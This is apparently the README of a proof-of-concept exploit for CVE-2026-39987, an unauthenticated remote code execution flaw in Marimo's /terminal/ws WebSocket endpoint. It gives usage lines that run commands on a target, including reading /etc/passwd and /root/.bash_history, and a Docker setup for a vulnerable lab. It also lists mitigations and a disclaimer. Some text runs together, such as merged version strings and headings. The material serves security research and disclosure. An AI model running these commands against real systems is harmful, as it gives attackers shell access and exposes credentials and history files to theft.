
CVE-2026-39987
Unauthenticated Remote Code Execution in Marimo via WebSocket Terminal
CVE-2026-39987 is a critical Pre-Authentication Remote Code Execution vulnerability affecting Marimo versions prior to 0.23.0. The /terminal/ws WebSocket endpoint completely bypasses authentication, allowing any unauthenticated attacker to obtain a full interactive PTY shell with the privileges of the Marimo process (typically root in Docker environments).
marimo < 0.23.0marimo >= 0.23.0/terminal/wshttp:// → ws:// and https:// → wss:// conversionCVE-2026-39987/
├── CVE-2026-39987-poc.py ← Main Exploit
├── docker-vulnerable/
│ ├── Dockerfile
│ └── docker-compose.yml
├── notebooks/ ← Persistent notebooks (optional)
├── README.md
└── LICENSE
pip install websocket-client
# Basic usage
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && hostname"
# System enumeration
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && cat /etc/os-release && ls -la /app"
# Read sensitive files
python3 CVE-2026-39987-poc.py http://target:2718 "cat /etc/passwd && cat /root/.bash_history"
cd docker-vulnerable
docker compose up --build -d
Then test:
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami"
marimo >= 0.23.0/terminal/ws via firewall or proxy rulesThis Proof of Concept is intended for educational purposes and authorized security testing only. The author is not responsible for any misuse or damage caused by this tool. Ensure you have explicit permission before testing any system.
Use ethically and responsibly.
Made for security research & responsible disclosure.